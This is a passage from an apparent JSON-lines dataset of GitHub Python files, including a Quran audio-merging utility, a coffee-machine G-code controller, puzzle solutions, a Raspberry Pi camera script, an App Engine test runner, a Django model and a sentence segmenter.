approxToNearestSeconds(time):\n return ceil(time / 1000) * 1000\n\ndef isDiff(x, y, tolerance):\n return abs(x - y) > tolerance\n\ndef circularIncIndex(arrayLength, currentIndex): return (currentIndex + 1) % arrayLength\ndef circularDecIndex(arrayLength, currentIndex): return (currentIndex - 1) % arrayLength\n\nimport json\ndef is_jsonable(x):\n try:\n json.dumps(x)\n return True\n except (TypeError, OverflowError):\n return False\n\nclass QuranPersistor:\n _quran = None\n _path = \"quran-simple-clean.txt\"\n\n\n @staticmethod\n def quran():\n if (not QuranPersistor._quran):\n with open(QuranPersistor._path, 'r', encoding=\"utf-8\") as quranFile:\n QuranPersistor._quran = quranFile.read().splitlines(False)\n return QuranPersistor._quran\n\n\nif __name__ == \"__main__\":\n print(QuranPersistor.quran()[0:5])\n","repo_name":"AmmarRabie/auto-combine-moshaf","sub_path":"src/helpers/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4623,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"5303696577","text":"# -*- coding: utf-8 -*-\n\nimport time\nimport math\nimport asyncio\nfrom logzero import logger\nfrom services.barista.point import Point\nfrom services.barista.point_translator import point_to_gcode\nfrom services.barista.point_translator import point_to_hcode\nfrom services.refill_service import RefillClient\nfrom services.output_temp_service import OutputTempClient\nfrom services.tank_temp_service import TankTempClient\n\n\nclass WasteWaterPosition(Point):\n def __init__(self, x, y, z):\n super(WasteWaterPosition, self).__init__()\n self.x = x\n self.y = y\n self.z = z\n\n\nclass WaterTransformer(object):\n def __init__(self, pid, output_temp):\n self._pid = pid\n self._output_temp = output_temp\n self._accumulated_water = 0\n self._current_target_temperature = None\n self._current_percentage = None\n self.low_temperature = None\n self.high_temperature = None\n self._previous_time = None\n self.reset()\n\n def reset(self):\n self._accumulated_water = 0\n self._current_target_temperature = None\n self._current_percentage = None\n self._previous_time = None\n self._pid.reset()\n\n async def transform(self, point):\n if point.t is not None and point.t != self._current_target_temperature:\n self._current_target_temperature = point.t\n self._current_percentage = (\n 
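# Note on incDbfs() in the utils.py record above: the loop slices
# obj[currentOffset:every] (a fixed end point, so every window after the
# first is empty or wrong) and the function falls off the end without
# returning the accumulated average. A hedged corrected sketch of the
# intended chunked average, assuming pydub's millisecond slicing semantics
# (note that averaging dBFS values directly is not a strict power average):
def inc_dbfs(obj, chunk_ms=2 * 60 * 1000):
    if len(obj) < 1000 * 9 * 60:            # short clips: one measurement
        return obj.dBFS
    chunks = [obj[i:i + chunk_ms] for i in range(0, len(obj), chunk_ms)]
    return sum(seg.dBFS for seg in chunks) / len(chunks)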
self._current_target_temperature - self.low_temperature) / (\n self.high_temperature - self.low_temperature)\n self.reset()\n\n if point.e is not None:\n if self._accumulated_water >= 10:\n temperature = await self._output_temp.get_temperature()\n diff_time = 0\n if self._previous_time is not None:\n current_time = time.time()\n diff_time = current_time - self._previous_time\n self._previous_time = current_time\n percentage = self._current_percentage + self._pid(\n temperature, self._current_target_temperature,\n diff_time) / 100\n if percentage > 1:\n percentage = 1\n elif percentage < 0:\n percentage = 0\n self._accumulated_water = 0\n\n point.e1 = point.e * percentage\n point.e2 = point.e - point.e1\n self._accumulated_water += point.e\n\n\nclass TimeTransformer(object):\n def __init__(self, x=0, y=0, z=0):\n self._position = Point.create_point(x=x, y=y, z=z)\n\n async def transform(self, point):\n if point.time is not None:\n return\n distance = self._calc_distance(point)\n if distance == 0:\n point.time = point.f\n else:\n point.time = distance * 60 / point.f\n self.set_position(x=point.x, y=point.y, z=point.z)\n\n def set_position(self, x=None, y=None, z=None):\n if x is not None:\n self._position.x = x\n if y is not None:\n self._position.y = y\n if z is not None:\n self._position.z = z\n\n def _calc_distance(self, point):\n distance = 0\n if point.x is not None:\n distance += (point.x - self._position.x)**2\n if point.y is not None:\n distance += (point.y - self._position.y)**2\n if point.z is not None:\n distance += (point.z - self._position.z)**2\n return math.sqrt(distance)\n\n\nclass Barista(object):\n def __init__(self, moving_dev, extruder_dev, mix_pid_dev,\n waste_water_position, default_moving_speed, bus):\n self._commands = {\n \"wait\": self._create_wait,\n \"calibration\": self._create_calibration,\n \"waste_water\": self._create_waste_water,\n \"mix\": self._create_mix,\n \"home\": self._create_home\n }\n\n self._moving_dev = moving_dev\n self._extruder_dev = extruder_dev\n self._waste_water_position = waste_water_position\n self._default_moving_speed = 5000\n self._bus = bus\n self._refill = RefillClient(bus)\n self._output_temp = OutputTempClient(bus)\n self._tank_temp = TankTempClient(bus)\n self._water_transformer = WaterTransformer(mix_pid_dev,\n self._output_temp)\n self._time_transformer = TimeTransformer()\n\n self._high_temperature = None\n self._low_temperature = None\n self._accumulated_water = 0\n\n self._stop = False\n self._stop_event = asyncio.Event()\n self._queue = asyncio.Queue(maxsize=1)\n\n self._position = Point.create_point(x=0, y=0, z=0)\n\n def _create_wait(self, param):\n _time = param['time']\n\n async def implement():\n nonlocal self\n nonlocal _time\n while not self._stop and _time > 0:\n asyncio.sleep(1)\n _time -= 1\n return True\n\n return implement\n\n def _create_calibration(self, _):\n async def implement():\n nonlocal self\n # move\n await self._move_to_waste_water_position()\n\n async def test_stable_temperature(self, points):\n pre_temp = await self._output_temp.get_temperature()\n if pre_temp is None:\n return None\n while True:\n await self._handle_point(points)\n temp = await self._output_temp.get_temperature()\n if temp is None:\n return None\n\n slope = abs((temp - pre_temp) / 5)\n if slope > 3 / 5:\n pre_temp = temp\n continue\n return temp\n\n # e2\n points = [Point.create_point(e2=0.6, time=0.1)] * 50\n self._water_transformer.high_temperature = await test_stable_temperature(\n self, points)\n if self._high_temperature is 
None:\n return False\n\n # e1\n points = [Point.create_point(e1=0.6, time=0.1)] * 50\n self._water_transformer.low_temperature = await test_stable_temperature(\n self, points)\n if self._low_temperature is None:\n return False\n return True\n\n return implement\n\n def _create_waste_water(self, _):\n async def implement():\n nonlocal self\n await self._move_to_waste_water_position()\n points = [Point.create_point(e1=3, e2=3, t=1)] * 10\n self._handle_point(points)\n return True\n\n return implement\n\n def _create_mix(self, param):\n target_temperature = param['t']\n\n async def implement():\n nonlocal self\n await self._move_to_waste_water_position()\n points = [\n Point.create_point(e=0.5, t=target_temperature, time=0.1)\n ] * 20\n previous_temperature = await self._output_temp.get_temperature()\n while True:\n self._handle_point(points)\n current_temperature = await self._output_temp.get_temperature()\n diff = abs(current_temperature - target_temperature)\n slope = abs(current_temperature - previous_temperature)\n if diff < 0.5 and slope < 3 / 5:\n break\n previous_temperature = current_temperature\n return True\n\n return implement\n\n def _create_home(self, _):\n async def implement():\n nonlocal self\n self._moving_dev.send('G28')\n self._time_transformer.set_position(x=0, y=0, z=0)\n return True\n\n return implement\n\n def _create_handle_points(self, point_param):\n async def implement():\n nonlocal self\n nonlocal point_param\n point = [Point.create_point(*point_param)]\n await self._handle_point(point)\n return True\n\n return implement\n\n async def _handle_point(self, points):\n for point in points:\n await self._water_transformer.transform(point)\n await self._time_transformer.transform(point)\n\n gcode = point_to_gcode(point)\n hcode = point_to_hcode(point)\n\n if gcode is not None:\n self._moving_dev.send(gcode)\n if hcode is not None:\n self._extruder_dev.send(hcode)\n\n if gcode is not None:\n while self._moving_dev.recv() != 'ok':\n await asyncio.sleep(0.1)\n if hcode is not None:\n while self._extruder_dev.recv() != 'ok':\n await asyncio.sleep(0.1)\n\n async def start(self):\n await self._bus.reg_rep('barista', self.command_callback)\n self._moving_dev.connect(3)\n self._extruder_dev.connect(3)\n\n # HOME, Set Unit to Millimeters,\n # Set to Absolute Positioning, Set extruder to relative mode\n for cmd in ['G28', 'G21', 'G90', 'M83']:\n self._moving_dev.send(cmd)\n\n while True:\n params = await self._queue.get()\n await self.brew(params)\n\n async def brew(self, params):\n await self._refill.stop()\n\n # XXX: maybe from config\n if self._water_transformer.low_temperature is None:\n self._water_transformer.low_temperature = 20\n if self._water_transformer.high_temperature is None:\n self._water_transformer.high_temperature = await self._tank_temp.get_temperature(\n )\n\n commands = []\n for param in params:\n if param['type'] == 'command' and param['name'] in self._commands:\n commands.append(self._commands[param['name']](param))\n elif 'point' in param:\n commands.append(self._create_handle_points(param['point']))\n else:\n logger.error('Invalid input point %s', param)\n continue\n\n self._reset()\n for command in commands:\n await command()\n\n await self._refill.start()\n\n async def command_callback(self, data):\n cmd = data['command']\n if cmd == 'get':\n return await self._status()\n elif cmd == 'brew':\n points = data['points']\n try:\n self._queue.put_nowait(points)\n return {'status': 'ok'}\n except asyncio.QueueFull:\n return {'status': 'error', 'message': 
'barista is busy'}\n\n def _reset(self):\n self._time_transformer.set_position(0, 0, 0)\n self._water_transformer.reset()\n\n async def _status(self):\n return {'status': 'ok'}\n\n async def _move_to_waste_water_position(self):\n points = [\n Point.create_move_point(\n x=self._waste_water_position.x,\n y=self._waste_water_position.y,\n z=self._waste_water_position.z,\n f=self._default_moving_speed)\n ]\n await self._handle_point(points)\n","repo_name":"Swind/TuringHardware","sub_path":"src/services/barista/barista.py","file_name":"barista.py","file_ext":"py","file_size_in_byte":11171,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"38659720784","text":"import collections\n\n\ndef getTriNum(n):\n return n*(n+1)/2\n\n\ndef getPrimeFactors(n):\n primes = []\n i = 2\n while i <= n:\n if n % i == 0:\n n = n/i\n primes.append(i)\n else:\n i = i + 1\n return primes\n\n\ndef getPrimeDuplicity(prime_factors):\n counter = collections.Counter(prime_factors)\n return counter.values()\n\n\ndef countPrimeFactors(primeDuplicity):\n powers = [x + 1 for x in primeDuplicity]\n product = 1\n for x in powers:\n product = x*product\n return product\n\n\nn_factors_max = 0\nfor i in range(0, 100000):\n n_factors = countPrimeFactors(\n getPrimeDuplicity(getPrimeFactors(getTriNum(i))))\n if n_factors > 500:\n print(i, ' ', getTriNum(i), ' ', n_factors)\n break\n","repo_name":"acjensen/project-euler","sub_path":"0012_HighlyDivisibleTriangularNumber.py","file_name":"0012_HighlyDivisibleTriangularNumber.py","file_ext":"py","file_size_in_byte":773,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"29429163331","text":"import torch\nfrom neko_sdk.ocr_modules.renderlite.addfffh import refactor_meta,add_masters,finalize\n\ndef buildrej(srcpt,dstpt,k=400):\n a=torch.load(srcpt);\n dst={};\n dst[\"chars\"]=a[\"chars\"][:k];\n dst[\"protos\"]=a[\"protos\"][:k+1]+[None];\n dst[\"sp_tokens\"]=a[\"sp_tokens\"];\n dst[\"label_dict\"]={};\n cnt=0;\n for c in dst[\"sp_tokens\"]:\n dst[\"label_dict\"][c]=cnt;\n cnt+=1;\n for c in dst[\"chars\"]:\n dst[\"label_dict\"][c]=cnt;\n cnt+=1;\n dst[\"label_dict\"]['[UNK]']=cnt;\n refactor_meta(dst);\n add_masters(dst, [], []);\n dst = finalize(dst);\n torch.save(dst,dstpt);\n print(\"built\",dstpt)\nif __name__ == '__main__':\n import sys\n if(len(sys.argv)>1):\n DROOT = sys.argv[1];\n else:\n DROOT= \"/run/media/lasercat/cache2/\"\n\n HWDB_ROOT = DROOT+\"/HWDB/pami_ch_fsl_hwdb/hwdbfsl_10_1/cuwu_evalhwdbfsl_10_1/\";\n CTW_ROOT = DROOT+\"/ctwch/ctwfsl_5_1eval/\";\n\n # buildrej(HWDB_ROOT+\"dict.pt\",HWDB_ROOT+\"dictrej.pt\");\n buildrej(HWDB_ROOT+\"dict.pt\",\n HWDB_ROOT+\"dictrej500.pt\",k=500);\n buildrej(HWDB_ROOT+\"dict.pt\",\n HWDB_ROOT+\"dictrej400.pt\",k=400);\n buildrej(HWDB_ROOT+\"dict.pt\",\n HWDB_ROOT+\"dictrej200.pt\",k=200);\n buildrej(HWDB_ROOT+\"dict.pt\",\n HWDB_ROOT+\"dictrej100.pt\",k=100);\n\n buildrej(CTW_ROOT+\"dict.pt\",CTW_ROOT+\"dictrej250.pt\",k=250);\n buildrej(CTW_ROOT+\"dict.pt\",CTW_ROOT+\"dictrej200.pt\",k=200);\n buildrej(CTW_ROOT+\"dict.pt\",CTW_ROOT+\"dictrej100.pt\",k=100);\n buildrej(CTW_ROOT+\"dict.pt\",CTW_ROOT+\"dictrej50.pt\",k=50);\n","repo_name":"lancercat/OSOCR-data","sub_path":"code/osocr_tasks/tasksg1/char_rej.py","file_name":"char_rej.py","file_ext":"py","file_size_in_byte":1551,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"19427861877","text":"# Definition for 
singly-linked list.\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\nclass Solution:\n def hasCycle(self, head: ListNode) -> bool:\n ht = {}\n cur = head\n while cur:\n if cur.val in ht:\n return True\n else:\n ht[cur.val] = 1\n cur = cur.next\n\n return False","repo_name":"soph666/code_challenges","sub_path":"Python/LeetCode_141_LinkedListCycle.py","file_name":"LeetCode_141_LinkedListCycle.py","file_ext":"py","file_size_in_byte":405,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"40833684824","text":"def sub(aae1): \n mmnt = len(aae1) \n sub = [1]*mmnt \n for j in range (1 , mmnt): \n for i in range(0 , j): \n if aae1[j] > aae1[i] and sub[j]< sub[i] + 1 : \n sub[j] = sub[i]+1\n maximum = 0\n for j in range(mmnt): \n maximum = max(maximum , sub[j]) \n return maximum\naar1=int(input()) \naae1 = list(map(int,input().split()))\nprint (sub(aae1))\n","repo_name":"Roshini28/pythonpgm","sub_path":"pro26.py","file_name":"pro26.py","file_ext":"py","file_size_in_byte":394,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"35551003646","text":"from time import sleep\nfrom picamera import PiCamera\nimport datetime\n\nDEFAULT_FOLDER = \"/home/pi/Desktop/\"\ncamera = PiCamera()\ncamera.resolution = (2592, 1944)\ncamera.rotation = 180\n\n\ndef capture_pic(folder=DEFAULT_FOLDER, name=None):\n global camera\n if camera.closed:\n camera = PiCamera()\n with camera as cam:\n if name:\n cam.capture(folder + name)\n else:\n cam.capture(folder + \"preview \" + fecha_formateada() + \".jpg\")\n\n\ndef capture_stream_pic(stream):\n global camera\n if camera.closed:\n camera = PiCamera()\n camera.capture(stream, format='jpeg')\n\n\ndef calcular_tiempo_time_lapse(cant_fotos, tiempo_entre_foto):\n return str(datetime.timedelta(seconds=cant_fotos * tiempo_entre_foto))\n\n\ndef time_lapse(cant_fotos, tiempo_entre_foto, folder=DEFAULT_FOLDER):\n image_number = 1\n while cant_fotos >= image_number:\n image_name = 'image{0:04d}.jpg'.format(image_number)\n camera.capture(folder + image_name)\n print(\"Foto \" + str(image_number) + \" de \" + str(cant_fotos))\n image_number += 1\n sleep(tiempo_entre_foto)\n camera.close()\n\n\ndef start_preview(time=5, fullscreen=False):\n camera.resolution = (1920, 1080)\n camera.start_preview(fullscreen = fullscreen, window=(0,0,640, 480)) \n sleep(time)\n if not time == 0:\n camera.stop_preview()\n\n\ndef stop_preview():\n camera.stop_preview()\n camera.close()\n\n\ndef record(time=5, folder=DEFAULT_FOLDER):\n with camera as cam:\n cam.resolution = (1920, 1080)\n cam.start_preview()\n cam.start_recording(folder + 'video' + fecha_formateada() + '.h264')\n sleep(time)\n cam.stop_recording()\n cam.stop_preview()\n\n\ndef show_effects(time=2):\n camera.resolution = (1920, 1080)\n camera.start_preview()\n for effect in camera.IMAGE_EFFECTS:\n camera.image_effect = effect\n camera.annotate_text = \"Effect: %s\" % effect\n sleep(time)\n camera.stop_preview()\n\n\ndef show_exposure(time=2):\n camera.resolution = (1920, 1080)\n camera.start_preview()\n for exposure in camera.EXPOSURE_MODES:\n camera.exposure_mode = exposure\n camera.annotate_text = \"Exposure: %s\" % exposure\n sleep(time)\n camera.stop_preview()\n\n\ndef fecha_formateada():\n return str(datetime.datetime.now().strftime(\"%Y-%m-%d %H-%M-%S\"))\n\n\ndef zoomear(x, y, w, h):\n camera.zoom = (x, y, w, 
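# Note on the LeetCode 141 solution above: hasCycle() keys its visited table
# on cur.val, so an acyclic list with a repeated value (e.g. 1 -> 1 -> None)
# is wrongly reported as cyclic; hashing the node object itself (identity)
# fixes that. Floyd's two-pointer variant needs no extra memory at all:
def has_cycle(head) -> bool:
    slow = fast = head
    while fast and fast.next:
        slow = slow.next
        fast = fast.next.next
        if slow is fast:        # identity comparison, immune to duplicate values
            return True
    return False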
h)\n","repo_name":"fbacinello/raspberry","sub_path":"camera/camera.py","file_name":"camera.py","file_ext":"py","file_size_in_byte":2425,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"26679959213","text":"__author__ = 'Sean Lip'\n\nimport argparse\nimport cStringIO\nimport logging\nimport os\nimport pdb\nimport shutil\nimport sys\nimport unittest\n\nimport task_queue\n\nimport webtest\n\nimport appengine_config\nfrom tools.etl import etl\n\nfrom google.appengine.api.search import simple_search_stub\nfrom google.appengine.datastore import datastore_stub_util\nfrom google.appengine.ext import testbed\n\n_PARSER = argparse.ArgumentParser()\n_PARSER.add_argument(\n '--test_class_name',\n help='optional dotted module name of the test(s) to run', type=str)\n_PARSER.add_argument(\n '--pdb',\n action='store_true',\n help='Automatically enter a debugger when an error occurs.')\n\n# Direct key access so we'll throw if os.environ is misconfigured.\nTEST_DATA_BASE = os.path.join(\n os.environ['COURSEBUILDER_RESOURCES'], 'test-data')\n\n\ndef empty_environ():\n os.environ['AUTH_DOMAIN'] = 'example.com'\n os.environ['SERVER_NAME'] = 'localhost'\n os.environ['HTTP_HOST'] = 'localhost'\n os.environ['SERVER_PORT'] = '8080'\n os.environ['USER_EMAIL'] = ''\n os.environ['USER_ID'] = ''\n os.environ['DEFAULT_VERSION_HOSTNAME'] = (\n os.environ['HTTP_HOST'] + ':' + os.environ['SERVER_PORT'])\n\n\ndef iterate_tests(test_suite_or_case):\n \"\"\"Iterate through all of the test cases in 'test_suite_or_case'.\"\"\"\n try:\n suite = iter(test_suite_or_case)\n except TypeError:\n yield test_suite_or_case\n else:\n for test in suite:\n for subtest in iterate_tests(test):\n yield subtest\n\n\nclass TestBase(unittest.TestCase):\n \"\"\"Base class for all Course Builder tests.\"\"\"\n\n INTEGRATION_SERVER_BASE_URL = 'http://localhost:8081'\n ADMIN_SERVER_BASE_URL = 'http://localhost:8000'\n\n STOP_AFTER_FIRST_FAILURE = False\n HAS_PENDING_FAILURE = False\n\n # Log level for all tests in this test case. Override if you need to test\n # against different logging levels. Be very careful when setting this to\n # logging.DEBUG: downstream code is sometimes very chatty at logging.DEBUG,\n # and can generate enough logging data that tests run out of memory.\n LOG_LEVEL = logging.ERROR\n\n def setUp(self):\n if TestBase.STOP_AFTER_FIRST_FAILURE:\n assert not TestBase.HAS_PENDING_FAILURE\n super(TestBase, self).setUp()\n self._set_up_logging()\n # e.g. 
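# Note on calcular_tiempo_time_lapse() in the camera.py record that ends
# above: str(datetime.timedelta(seconds=n)) renders n seconds as H:MM:SS,
# so the total run time of a time lapse falls out directly:
import datetime

assert str(datetime.timedelta(seconds=120 * 30)) == '1:00:00'  # 120 shots, 30 s apart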
TEST_DATA_BASE/tests/functional/tests/MyTestCase.\n self.test_tempdir = os.path.join(\n TEST_DATA_BASE, self.__class__.__module__.replace('.', os.sep),\n self.__class__.__name__)\n self.reset_filesystem()\n self._originals = {} # Map of object -> {symbol_string: original_value}\n\n def _set_up_logging(self):\n self._log = cStringIO.StringIO()\n self._stream_handler = logging.StreamHandler(self._log)\n self._stream_handler.setFormatter(\n logging.Formatter(fmt='%(levelname)s: %(message)s'))\n self._logger = logging.getLogger()\n self._logger.addHandler(self._stream_handler)\n self._logger.setLevel(self.LOG_LEVEL)\n\n def tearDown(self):\n self._unswap_all()\n self.reset_filesystem(remove_only=True)\n self._tear_down_logging()\n super(TestBase, self).tearDown()\n\n def _tear_down_logging(self):\n self._logger.removeHandler(self._stream_handler)\n self._log.close()\n\n def get_log(self):\n self._log.flush()\n return self._log.getvalue()\n\n def assertLogContains(self, message):\n self.assertIn(message, self.get_log())\n\n def assertLogDoesNotContain(self, message):\n self.assertNotIn(message, self.get_log())\n\n def reset_filesystem(self, remove_only=False):\n if os.path.exists(self.test_tempdir):\n shutil.rmtree(self.test_tempdir)\n if not remove_only:\n os.makedirs(self.test_tempdir)\n\n def run(self, result=None):\n if not result:\n result = self.defaultTestResult()\n super(TestBase, self).run(result)\n if not result.wasSuccessful():\n TestBase.HAS_PENDING_FAILURE = True\n\n def shortDescription(self):\n \"\"\"Additional information logged during unittest invocation.\"\"\"\n # Suppress default logging of docstrings. Instead log name/status only.\n return None\n\n def swap(self, source, symbol, new): # pylint: disable=invalid-name\n \"\"\"Swaps out source.symbol for a new value.\n\n Allows swapping of members and methods:\n\n myobject.foo = 'original_foo'\n self.swap(myobject, 'foo', 'bar')\n self.assertEqual('bar', myobject.foo)\n myobject.baz() # -> 'original_baz'\n self.swap(myobject, 'baz', lambda: 'quux')\n self.assertEqual('quux', myobject.bar())\n\n Swaps are automatically undone in tearDown().\n\n Args:\n source: object. The source object to swap from.\n symbol: string. The name of the symbol to swap.\n new: object. 
The new value to swap in.\n \"\"\"\n if source not in self._originals:\n self._originals[source] = {}\n if not self._originals[source].get(symbol, None):\n self._originals[source][symbol] = getattr(source, symbol)\n setattr(source, symbol, new)\n\n def _unswap_all(self):\n for source, symbol_to_value in self._originals.iteritems():\n for symbol, value in symbol_to_value.iteritems():\n setattr(source, symbol, value)\n\n\nclass FunctionalTestBase(TestBase):\n \"\"\"Base class for functional tests.\"\"\"\n\n\nclass AppEngineTestBase(FunctionalTestBase):\n \"\"\"Base class for tests that require App Engine services.\"\"\"\n\n def getApp(self):\n \"\"\"Returns the main application to be tested.\"\"\"\n raise Exception('Not implemented.')\n\n def setUp(self):\n super(AppEngineTestBase, self).setUp()\n empty_environ()\n\n # setup an app to be tested\n self.testapp = webtest.TestApp(self.getApp())\n self.testbed = testbed.Testbed()\n self.testbed.activate()\n\n # configure datastore policy to emulate instantaneously and globally\n # consistent HRD; we also patch dev_appserver in main.py to run under\n # the same policy\n policy = datastore_stub_util.PseudoRandomHRConsistencyPolicy(\n probability=1)\n\n # declare any relevant App Engine service stubs here\n self.testbed.init_user_stub()\n self.testbed.init_memcache_stub()\n self.testbed.init_datastore_v3_stub(consistency_policy=policy)\n self.testbed.init_taskqueue_stub(root_path=os.environ['SOURCE_DIR'])\n self.taskq = self.testbed.get_stub(testbed.TASKQUEUE_SERVICE_NAME)\n self.testbed.init_urlfetch_stub()\n self.testbed.init_files_stub()\n self.testbed.init_blobstore_stub()\n self.testbed.init_mail_stub()\n self.testbed.init_app_identity_stub()\n # TODO(emichael): Fix this when an official stub is created\n self.testbed._register_stub(\n 'search', simple_search_stub.SearchServiceStub())\n self.task_dispatcher = task_queue.TaskQueueHandlerDispatcher(\n self.testapp, self.taskq)\n\n # Handle for testing sent mail.\n self.mail_stub = self.testbed.get_stub(testbed.MAIL_SERVICE_NAME)\n\n def tearDown(self):\n self.testbed.deactivate()\n super(AppEngineTestBase, self).tearDown()\n\n def get_mail_stub(self):\n return self.testbed.get_stub(testbed.MAIL_SERVICE_NAME)\n\n\ndef create_test_suite(parsed_args):\n \"\"\"Loads all requested test suites.\n\n By default, loads all unittest.TestCases found under the project root's\n tests/ directory.\n\n Args:\n parsed_args: argparse.Namespace. Processed command-line arguments.\n\n Returns:\n unittest.TestSuite. The test suite populated with all tests to run.\n \"\"\"\n loader = unittest.TestLoader()\n if not parsed_args.test_class_name:\n raise Exception('Expected --test_class_name to be specified.')\n os.environ['GCB_TEST_MODE'] = 'true'\n return loader.loadTestsFromName(parsed_args.test_class_name)\n\n\ndef fix_sys_path():\n \"\"\"Fix the sys.path to include GAE extra paths.\"\"\"\n import dev_appserver # pylint: disable=C6204\n\n # dev_appserver.fix_sys_path() prepends GAE paths to sys.path and hides\n # our classes like 'tests' behind other modules that have 'tests'.\n # Here, unlike dev_appserver, we append the path instead of prepending it,\n # so that our classes come first.\n sys.path += dev_appserver.EXTRA_PATHS[:]\n\n # This is to work around an issue with the __import__ builtin. 
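# Note on TestBase.swap() above: the `if not self._originals[source].get(
# symbol, None)` guard means a falsy original value (None, 0, '') gets
# re-recorded on a second swap, clobbering the true original; testing
# membership (`symbol not in self._originals[source]`) avoids that. The
# standard-library equivalent of the whole swap/unswap pattern is
# unittest.mock.patch.object:
from unittest import mock

class Thing:
    foo = 'original'

with mock.patch.object(Thing, 'foo', 'bar'):
    assert Thing.foo == 'bar'
assert Thing.foo == 'original'   # restored automatically on exit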
The\n # problem seems to be that if the sys.path list contains an item that\n # partially matches a package name to import, __import__ will get\n # confused, and report an error message (which removes the first path\n # element from the module it's complaining about, which does not help\n # efforts to diagnose the problem at all).\n #\n # The specific case where this causes an issue is between\n # $COURSEBUILDER_HOME/tests/internal and $COURSEBUILDER_HOME/internal\n # Since the former exists, __import__ will ignore the second, and so\n # things like .../internal/experimental/autoregister/autoregister\n # cannot be loaded.\n #\n # To address this issue, we ensure that COURSEBUILDER_HOME is on sys.path\n # before anything else, and do it before appengine_config's module\n # importation starts running. (And we have to do it here, because if we\n # try to do this within appengine_config, AppEngine will throw an error)\n if appengine_config.BUNDLE_ROOT in sys.path:\n sys.path.remove(appengine_config.BUNDLE_ROOT)\n sys.path.insert(0, appengine_config.BUNDLE_ROOT)\n\n\nclass DebugTestResult(unittest.TextTestResult):\n\n def addError(self, test, err):\n pdb.post_mortem(err[2])\n super(DebugTestResult, self).addError(test, err)\n\n def addFailure(self, test, err):\n pdb.post_mortem(err[2])\n super(DebugTestResult, self).addFailure(test, err)\n\n\ndef main():\n \"\"\"Starts in-process server and runs all test cases in this module.\"\"\"\n fix_sys_path()\n\n etl._set_env_vars_from_app_yaml()\n parsed_args = _PARSER.parse_args()\n test_suite = create_test_suite(parsed_args)\n\n kwargs = {\n 'verbosity': 2,\n }\n\n if parsed_args.pdb:\n kwargs['resultclass'] = DebugTestResult\n\n result = unittest.TextTestRunner(**kwargs).run(test_suite)\n if result.errors or result.failures:\n raise Exception(\n 'Test suite failed: %s errors, %s failures of '\n ' %s tests run.' % (\n len(result.errors), len(result.failures), result.testsRun))\n\n import tests.functional.actions as actions\n\n count = len(actions.UNIQUE_URLS_FOUND.keys())\n result.stream.writeln('INFO: Unique URLs found: %s' % count)\n result.stream.writeln('INFO: All %s tests PASSED!' 
% result.testsRun)\n\n\nif __name__ == '__main__':\n appengine_config.gcb_force_default_encoding('ascii')\n main()\n","repo_name":"google/coursebuilder-core","sub_path":"coursebuilder/tests/suite.py","file_name":"suite.py","file_ext":"py","file_size_in_byte":10982,"program_lang":"python","lang":"en","doc_type":"code","stars":144,"dataset":"github-code","pt":"5"} +{"seq_id":"6289993150","text":"def sequence():\r\n \"\"\"\r\n Function for squaring each element in a list and printing them\r\n \"\"\"\r\n\r\n A = [1, 2, 3, 4, 5, 6] # Sample List\r\n for i in range(len(A)): # 'for' loop to traverse the List\r\n A[i] = A[i]**2 # Squaring each element of the list\r\n for a in A: # Printing the New list\r\n print(a)\r\n\r\n print(\"The sequence has ended\") # Showing that the sequence has ended\r\n\r\n\r\nif __name__ == '__main__':\r\n sequence()\r\n","repo_name":"akashqp/Internshala---Fittlyf-Assignment","sub_path":"Question_1.py","file_name":"Question_1.py","file_ext":"py","file_size_in_byte":492,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"38273334660","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\nfrom django.db import models\n\n\nclass ContactInfo(models.Model):\n address = models.CharField(max_length=256)\n email = models.EmailField()\n tel = models.CharField(max_length=14)\n fb = models.URLField(max_length=256)\n fb_icon = models.ImageField(\n null=False,\n blank=False,\n height_field=\"height_field\",\n width_field=\"width_field\"\n )\n twitter = models.URLField(max_length=256)\n twitter_icon = models.ImageField(\n null=False,\n blank=False,\n height_field=\"height_field\",\n width_field=\"width_field\"\n )\n instagram = models.URLField(max_length=256)\n instagram_icon = models.ImageField(\n null=False,\n blank=False,\n height_field=\"height_field\",\n width_field=\"width_field\"\n )\n height_field = models.IntegerField(default=30)\n width_field = models.IntegerField(default=30)\n\n def __unicode__(self):\n return self.email\n","repo_name":"saadmk11/Restaurant-Website","sub_path":"src/contact/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1016,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"5"} +{"seq_id":"10541732018","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Sep 9 14:31:41 2018\r\n\r\n@author: James\r\n\"\"\"\r\n\r\n#list of common abbreviations\r\nabbreviations = [\"mr.\", \"mrs.\", \"ms.\", \"dr.\", \"st.\", \"e.g.\", \"i.e.\", \"jr.\", \"sr.\", \"vs.\", \"ph.d.\", \"mt.\", \"p.s.\", \"a.s.a.p.\", \"d.i.y.\"]\r\n#variables\r\nsentenceNum = 1\r\nsentence = \"\"\r\nsentenceList = []\r\nclosedQuote = True\r\n\r\n\r\n\r\n\r\n\r\n#read in the input file, remove new lines, split based on spaces\r\n#data= open(\"test_input3.txt\", \"r\")\r\ndata= open(\"input.txt\", \"r\")\r\ndata= data.read()\r\ndata = data.replace(\"\\n\", \" \")\r\ndata=data.split(' ')\r\n\r\n\r\n\r\n\r\n#segmentSentences function takes in a list of words, combines them into sentences, and adds those sentences to sentenceList \r\ndef segmentSentences(words):\r\n global sentence\r\n global closedQuote\r\n #loop through each word in the input file\r\n for i in words:\r\n #bool closedQuote is only false when there is an opening quotation mark, but not a closing one\r\n if('\"' in i):\r\n closedQuote = not closedQuote\r\n # this if is for words that contain the end of a quotation\r\n if(closedQuote == True and '\"' in i):\r\n 